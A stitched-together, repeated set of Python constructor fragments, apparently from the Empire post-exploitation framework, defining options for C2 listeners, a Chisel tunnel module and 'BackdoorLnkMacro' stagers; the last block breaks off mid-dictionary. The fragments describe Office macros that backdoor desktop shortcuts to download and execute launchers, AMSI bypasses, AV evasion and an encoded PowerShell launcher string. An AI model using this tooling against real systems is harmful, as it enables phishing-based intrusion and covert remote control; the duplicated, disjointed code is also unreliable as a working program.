def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Meterpreter',
'Author': ['@harmj0y'],
'Description':
("Starts a 'foreign' http[s] Meterpreter listener."),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'meterpreter'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s:%s" % (helpers.lhost(), 80)
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': 80
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Meterpreter',
'Author': ['@harmj0y'],
'Description': ("Starts a 'foreign' http[s] Meterpreter listener."),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'meterpreter'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
def __init__(self, mainMenu, params=[]):
self.info = {
'Name':
'HTTP[S] + MAPI',
'Author': ['@harmj0y', '@_staaldraad'],
'Description':
('Starts a http[s] listener (PowerShell) which can be used with Liniaal for C2 through Exchange'
),
'Category': ('client_server'),
'Comments': [
'This requires the Liniaal agent to translate messages from MAPI to HTTP. More info: https://github.com/sensepost/liniaal'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'mapi'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 0
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description':
'Default communication profile for the agent.',
'Required':
True,
'Value':
"/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Folder': {
'Description': 'The hidden folder in Exchange to user',
'Required': True,
'Value': 'Liniaal'
},
'Email': {
'Description': 'The email address of our target',
'Required': False,
'Value': ''
},
'SlackToken': {
'Description':
'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description':
'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [
a.strip('/') for a in self.options['DefaultProfile']
['Value'].split('|')[0].split(',')
]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(
helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Template',
'Author': ['@harmj0y'],
'Description': ("Listener template"),
# categories - client_server, peer_to_peer, broadcast, third_party
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Listener name.',
'Required' : True,
'Value' : 'http_foreign'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {} # used to keep track of any threaded instances of this server
# optional/specific for this module
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ("Starts a 'foreign' http[s] Empire listener."),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http_foreign'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s" % (helpers.lhost())
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Template',
'Author': ['@harmj0y'],
'Description': ("Listener template"),
# categories - client_server, peer_to_peer, broadcast, third_party
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description':
'Default communication profile for the agent.',
'Required':
True,
'Value':
"/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'ServerVersion': {
'Description': 'Server header for the control server.',
'Required': True,
'Value': 'Microsoft-IIS/7.5'
},
'StagerURI': {
'Description': 'URI for the stager. Example: stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description':
'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description':
'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description':
'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackToken': {
'Description':
'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description':
'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {
} # used to keep track of any threaded instances of this server
# optional/specific for this module
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(
helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name':
'BackdoorLnkMacro',
'Author': ['G0ldenGun (@G0ldenGunSec)'],
'Description':
('Generates a macro that backdoors .lnk files on the users desktop, backdoored lnk files in turn attempt to download & execute an empire launcher when the user clicks on them. Usage: Two files will be spawned from this, a macro that should be placed in an office document and an xml that should be placed on a web server accessible by the remote system. By default this xml is written to /var/www/html, which is the webroot on debian-based systems such as kali.'
),
'Comments': [
'Two-stage macro attack vector used for bypassing tools that perform relational analysis and flag / block process launches from unexpected programs, such as office. The initial run of the macro is pure vbscript (no child processes spawned) and will backdoor shortcuts on the desktop to do a direct run of powershell. The second step occurs when the user clicks on the shortcut, the powershell download stub that runs will attempt to download & execute an empire launcher from an xml file hosted on a pre-defined webserver, which will in turn grant a full shell. Credits to @harmj0y and @enigma0x3 for designing the macro stager that this was originally based on.'
]
}
xmlVar = ''.join(
random.sample(string.ascii_uppercase + string.ascii_lowercase,
random.randint(5, 9)))
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language': {
'Description': 'Language of the launcher to generate.',
'Required': True,
'Value': 'powershell'
},
'TargetEXEs': {
'Description':
'Will backdoor .lnk files pointing to selected executables (do not include .exe extension), enter a comma seperated list of target exe names - ex. iexplore,firefox,chrome',
'Required': True,
'Value': 'iexplore,firefox,chrome'
},
'XmlUrl': {
'Description':
'remotely-accessible URL to access the XML containing launcher code.',
'Required': True,
'Value': "http://" + helpers.lhost() + "/" + xmlVar + ".xml"
},
'OutFile': {
'Description':
'File to output macro to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/macro'
},
'XmlOutFile': {
'Description': 'Local path + file to output xml to.',
'Required': True,
'Value': '/var/www/html/' + xmlVar + '.xml'
},
'UserAgent': {
'Description':
'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description':
'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'ProxyCreds': {
'Description':
'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] + MAPI',
'Author': ['@harmj0y','@_staaldraad'],
'Description': ('Starts a http[s] listener (PowerShell) which can be used with Liniaal for C2 through Exchange'),
'Category' : ('client_server'),
'Comments': ['This requires the Liniaal agent to translate messages from MAPI to HTTP. More info: https://github.com/sensepost/liniaal']
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'mapi'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 0
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'TServer header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'Folder' : {
'Description' : 'The hidden folder in Exchange to user',
'Required' : True,
'Value' : 'Liniaal'
},
'Email' : {
'Description' : 'The email address of our target',
'Required' : False,
'Value' : ''
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name':
'BackdoorLnkMacro',
'Author': ['@G0ldenGunSec'],
'Description':
('Generates a macro that backdoors .lnk files on the users desktop, backdoored lnk files in turn attempt to download & execute an empire launcher when the user clicks on them. Usage: Three files will be spawned from this, an xls document (either new or containing existing contents) that data will be placed into, a macro that should be placed in the spawned xls document, and an xml that should be placed on a web server accessible by the remote system (as defined during stager generation). By default this xml is written to /var/www/html, which is the webroot on debian-based systems such as kali.'
),
'Comments': [
'Two-stage macro attack vector used for bypassing tools that perform monitor parent processes and flag / block process launches from unexpected programs, such as office. The initial run of the macro is vbscript and spawns no child processes, instead it backdoors targeted shortcuts on the users desktop to do a direct run of powershell next time they are clicked. The second step occurs when the user clicks on the shortcut, the powershell download stub that runs will attempt to download & execute an empire launcher from an xml file hosted on a pre-defined webserver, which will in turn grant a full shell. Credits to @harmJ0y and @enigma0x3 for designing the macro stager that this was originally based on, @subTee for research pertaining to the xml.xmldocument cradle, and @curi0usJack for info on using cell embeds to evade AV.'
]
}
# random name our xml will default to in stager options
xmlVar = ''.join(
random.sample(string.ascii_uppercase + string.ascii_lowercase,
random.randint(5, 9)))
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Obfuscate': {
'Description':
'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required': False,
'Value': 'False'
},
'ObfuscateCommand': {
'Description':
'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required': False,
'Value': r'Token\All\1'
},
'AMSIBypass': {
'Description':
'Include mattifestation\'s AMSI Bypass in the stager code.',
'Required': False,
'Value': 'True'
},
'AMSIBypass2': {
'Description':
'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required': False,
'Value': 'False'
},
'Language': {
'Description': 'Language of the launcher to generate.',
'Required': True,
'Value': 'powershell'
},
'TargetEXEs': {
'Description':
'Will backdoor .lnk files pointing to selected executables (do not include .exe extension), enter a comma seperated list of target exe names - ex. iexplore,firefox,chrome',
'Required': True,
'Value': 'iexplore,firefox,chrome'
},
'XmlUrl': {
'Description':
'remotely-accessible URL to access the XML containing launcher code. Please try and keep this URL short, as it must fit in the given 1024 chars for args along with all other logic - default options typically allow for 100-200 chars of extra space, depending on targeted exe',
'Required': True,
'Value': "http://" + helpers.lhost() + "/" + xmlVar + ".xml"
},
'XlsOutFile': {
'Description':
'XLS (incompatible with xlsx/xlsm) file to output stager payload to. If document does not exist / cannot be found a new file will be created',
'Required': True,
'Value': '/tmp/default.xls'
},
'OutFile': {
'Description':
'File to output macro to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/macro'
},
'XmlOutFile': {
'Description': 'Local path + file to output xml to.',
'Required': True,
'Value': '/var/www/html/' + xmlVar + '.xml'
},
'KillDate': {
'Description':
'Date after which the initial powershell stub will no longer attempt to download and execute code, set this for the end of your campaign / engagement. Format mm/dd/yyyy',
'Required': True,
'Value': datetime.datetime.now().strftime("%m/%d/%Y")
},
'UserAgent': {
'Description':
'User-agent string to use for the staging request (default, none, or other) (2nd stage).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description':
'Proxy to use for request (default, none, or other) (2nd stage).',
'Required': False,
'Value': 'default'
},
'StagerRetries': {
'Description':
'Times for the stager to retry connecting (2nd stage).',
'Required': False,
'Value': '0'
},
'ProxyCreds': {
'Description':
'Proxy credentials ([domain\]username:password) to use for request (default, none, or other) (2nd stage).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'BackdoorLnkFileMacroXML',
'Author': ['G0ldenGun'],
'Description': ('Generates an office macro that sets up a backdoored .lnk file, which in turn attempts to download & execute an empire launcher when the user clicks on it. \n\nUsage: Two files will be spawned from this, a macro that should be placed in an office document and an xml that should be placed on a web server accessible by the remote system. By default this xml is written to /var/www/html, which is the webroot on debian-based systems such as kali.'),
'Comments': [
''
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'LNKPath' : {
'Description' : 'DOESNT DO ANYTHING YET AS WE ARE HARDCODED FOR IE, PUT ANYTHING IN HERE -- Full path to the .LNK to backdoor.',
'Required' : True,
'Value' : ''
},
'XmlUrl' : {
'Description' : 'remotely-accessible URL to access the XML containing launcher code.',
'Required' : True,
'Value' : "http://" + helpers.lhost() + "/netInfo.xml"
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'XmlOutFile' : {
'Description' : 'Local path + file to output xml to.',
'Required' : True,
'Value' : '/var/www/html/netInfo.xml'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-SharpChiselClient',
'Author': ['@jpillora', '@shantanukhande'],
'Description': ("Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. "
"Written in Go (golang). Chisel is mainly useful for passing through firewalls, "
"though it can also be used to provide a secure endpoint into your network."),
'Software': '',
'Techniques': ['T1090'],
'Background': True,
'OutputExtension': None,
'NeedsAdmin': False,
'OpsecSafe': True,
'Language': 'powershell',
'MinLanguageVersion': '2',
'Comments': [
'This is the Chisel client loaded with reflection. A chisel server needs to be started before ',
'running this module. Only Chisel server v1.7.2 was tested with this module. Chisel server ',
'should be started like so: "./chisel server --reverse"',
'https://github.com/jpillora/chisel'
]
}
self.options = {
'Agent': {
'Description': 'Agent to run module on.',
'Required': True,
'Value': ''
},
'Server': {
'Description': 'URL of the Chisel server.',
'Required': True,
'Value': 'http://%s:8080' % (helpers.lhost())
},
'Remote': {
'Description': 'Remote(s) for the Chisel server.',
'Required': True,
'Value': 'R:socks'
},
'Fingerprint': {
'Description': 'Fingerprint string to perform host-key validation against the server\'s public key',
'Required': False,
'Value': ''
}
}
self.mainMenu = mainMenu
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ("Starts a 'foreign' http[s] Empire listener."),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http_foreign'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http_com'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'RequestHeader' : {
'Description' : 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required' : True,
'Value' : 'CF-RAY'
},
'ServerVersion' : {
'Description' : 'Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0,64)
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'BackdoorLnkMacro',
'Author': ['@G0ldenGunSec'],
'Description': ('Generates a macro that backdoors .lnk files on the users desktop, backdoored lnk files in turn attempt to download & execute an empire launcher when the user clicks on them. Usage: Three files will be spawned from this, an xls document (either new or containing existing contents) that data will be placed into, a macro that should be placed in the spawned xls document, and an xml that should be placed on a web server accessible by the remote system (as defined during stager generation). By default this xml is written to /var/www/html, which is the webroot on debian-based systems such as kali.'),
'Comments': ['Two-stage macro attack vector used for bypassing tools that perform monitor parent processes and flag / block process launches from unexpected programs, such as office. The initial run of the macro is vbscript and spawns no child processes, instead it backdoors targeted shortcuts on the users desktop to do a direct run of powershell next time they are clicked. The second step occurs when the user clicks on the shortcut, the powershell download stub that runs will attempt to download & execute an empire launcher from an xml file hosted on a pre-defined webserver, which will in turn grant a full shell. Credits to @harmJ0y and @enigma0x3 for designing the macro stager that this was originally based on, @subTee for research pertaining to the xml.xmldocument cradle, and @curi0usJack for info on using cell embeds to evade AV.']
}
#random name our xml will default to in stager options
xmlVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(5,9)))
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the launcher to generate.',
'Required' : True,
'Value' : 'powershell'
},
'TargetEXEs' : {
'Description' : 'Will backdoor .lnk files pointing to selected executables (do not include .exe extension), enter a comma seperated list of target exe names - ex. iexplore,firefox,chrome',
'Required' : True,
'Value' : 'iexplore,firefox,chrome'
},
'XmlUrl' : {
'Description' : 'remotely-accessible URL to access the XML containing launcher code. Please try and keep this URL short, as it must fit in the given 1024 chars for args along with all other logic - default options typically allow for 100-200 chars of extra space, depending on targeted exe',
'Required' : True,
